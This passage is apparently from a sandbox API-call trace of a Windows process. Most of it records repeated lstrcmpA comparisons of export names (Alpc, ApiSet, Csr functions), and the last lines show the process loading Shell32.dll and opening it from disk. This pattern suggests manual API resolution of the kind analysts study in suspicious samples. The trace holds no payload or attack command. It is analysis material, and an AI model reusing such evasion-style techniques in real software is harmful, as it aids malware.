lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.166] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.166] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0151.167] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.168] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0151.168] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.169] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.169] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.170] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.170] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0151.170] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0151.171] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.172] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0151.172] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0151.173] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0151.173] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0151.173] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0151.173] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0151.173] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.173] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0151.174] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0151.174] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.175] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0151.176] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0151.176] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0151.177] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0151.177] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0151.177] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0151.177] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0151.177] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0152.871] GetProcessHeap () returned 0x4d0000 [0152.871] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4001040 | out: hHeap=0x4d0000) returned 1 [0152.881] GetProcessHeap () returned 0x4d0000 [0152.881] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e90b0 [0152.881] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0152.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0152.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0152.882] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0152.882] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0152.882] GetProcAddress 